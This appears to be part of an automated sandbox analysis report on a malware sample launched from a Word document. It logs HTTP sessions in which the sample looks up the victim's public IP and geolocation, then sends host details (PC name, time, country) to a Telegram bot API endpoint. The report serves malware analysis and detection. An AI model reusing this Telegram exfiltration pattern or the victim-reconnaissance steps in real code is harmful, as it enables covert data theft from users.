                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:31.874126911 CEST682INHTTP/1.1 502 Bad Gateway
                                                Date: Thu, 26 Sep 2024 07:25:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.2249175132.226.8.169803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:32.059623003 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:35.570316076 CEST682INHTTP/1.1 502 Bad Gateway
                                                Date: Thu, 26 Sep 2024 07:25:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Sep 26, 2024 09:25:35.779557943 CEST682INHTTP/1.1 502 Bad Gateway
                                                Date: Thu, 26 Sep 2024 07:25:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.2249176193.122.6.168803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:36.499825001 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:38.126357079 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:38 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bff4a0dcab9afbc8f9305928c16fc196
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:38.331623077 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:38 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bff4a0dcab9afbc8f9305928c16fc196
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.2249165188.114.97.34433520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 07:25:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:11 UTC682INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:11 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 343
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mu2szc4b%2FvapzqbI8Up%2F%2BaIT2K3lZU%2FRtsXYlVYsN3fANNPQYUdq%2FThKg5pO6%2BJJF3H7K27yeb3NWO0mmC6z8kGUPe1X9xK9fkSRFKorBFUXew%2ByRJibynwKX6cFrYxRaCiOHSrB"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c9184c26b1641ac-EWR
                                                2024-09-26 07:25:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.2249166188.114.97.34433520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 07:25:12 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-09-26 07:25:12 UTC704INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:12 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 344
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RxE7rVdRG34Q9Qzvyj5MMxJbmKvOikmoJsyeD6T%2BMZ0jPU%2B58M3d7xkUET2h4VA1ioNI%2Bpd9V7lOhPeUivcnLGRb5vCjE4P3CDPN6YUyXajIk9pjyWX8SN6uTE1D2zn8W9LEKD0"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c9184c7990fc472-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-09-26 07:25:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.2249169188.114.96.34433520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 07:25:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:23 UTC680INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 355
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eq5Khe9OpstVaq%2BCjVcY%2BGvp09kMcRh6Fne6MhcDlll0zUtSTL%2FfCi6qI4mN9eKlhiBFcI48%2FMgbvY0MrXicszoqUNY0IL2d%2Fqsgq0jwHx9GjIx81g4tochzvjQq2qn05108PA%2B6"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c91850ed9d343cf-EWR
                                                2024-09-26 07:25:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.2249171188.114.96.34433520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 07:25:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:28 UTC678INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:28 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 360
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NyYeT0MxH4U6szGAcrRenDaKf84UGPCe%2B%2BX%2FL0pJe%2Bn7pqBMCwIRXe3dft9BotLUopcVB8dACcXFyiybl1fHBLBrJxhjlBU2oahM755B%2BmA95BWp14o7GTf8zFKyhoHiWoayQMJH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c91852deb998cbd-EWR
                                                2024-09-26 07:25:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.2249173188.114.97.34433520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 07:25:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-09-26 07:25:29 UTC672INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 361
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ts4GwULEUS86aH0jsLHritAqM5XJVsg8e6dpR0UqJPvXLJuCbGvXrLSFHn6mSyzBf6OlyyPkimpjlaAdAEfetk3R0AEcUSH8IwwY%2F%2Fagr7b7PA5qfnocPX9HMgs9aIioPgS2ph8z"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c918535ec569e08-EWR
                                                2024-09-26 07:25:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.2249177188.114.96.34433520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 07:25:38 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:38 UTC682INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:38 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 370
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9Mkes%2BGkIDbPP86M7vaU1BSBX5M5cEp7EKQKP51bnd7VPjphKamanod5ue3mYhe%2BFoHVD5YGtArpGq3%2F8itFuB9rx1YGJHMw%2FrasYqrl%2FhQNGd54WsBkQkvwgVSX%2Fryzo%2FRAa32"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c91856d29ca42bf-EWR
                                                2024-09-26 07:25:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.2249178149.154.167.2204433520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 07:25:40 UTC353OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:40 UTC344INHTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Thu, 26 Sep 2024 07:25:40 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-09-26 07:25:40 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:03:24:55
                                                Start date:26/09/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f080000
                                                File size:1'423'704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
